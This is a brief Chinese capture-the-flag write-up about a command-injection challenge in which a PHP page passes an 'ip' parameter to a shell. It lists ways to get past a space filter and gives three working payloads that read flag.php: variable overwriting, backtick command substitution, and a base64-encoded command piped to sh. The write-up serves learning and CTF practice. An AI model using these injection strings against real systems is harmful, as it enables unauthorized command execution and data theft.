打开后空空如也,随便输入1;ls 开始尝试
直接cat flag尝试
啊 这... 看样子是空格被屏蔽了
********************记一下几种空格绕过方法
1 ${IFS}替换
2 $IFS$1替换
3 ${IFS替换
4 %20替换
5 <和<>重定向符替换
6 %09替换
试到了第二个后
说明是 flag 遇到了屏蔽 。这往后就触及到了我的知识盲点
*********另起炉灶
进入index.php文件
get到了源码。
我们可以观察到很多方法都被屏蔽了
方法一: 变量覆盖
url=?ip=1;a=g;cat$IFS$1fla$a.php;
一个字 绝。
方法二: 内敛绕过:
?ip=127.0.0.1;cat$IFS$1`ls`
方法三:base64编码:
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh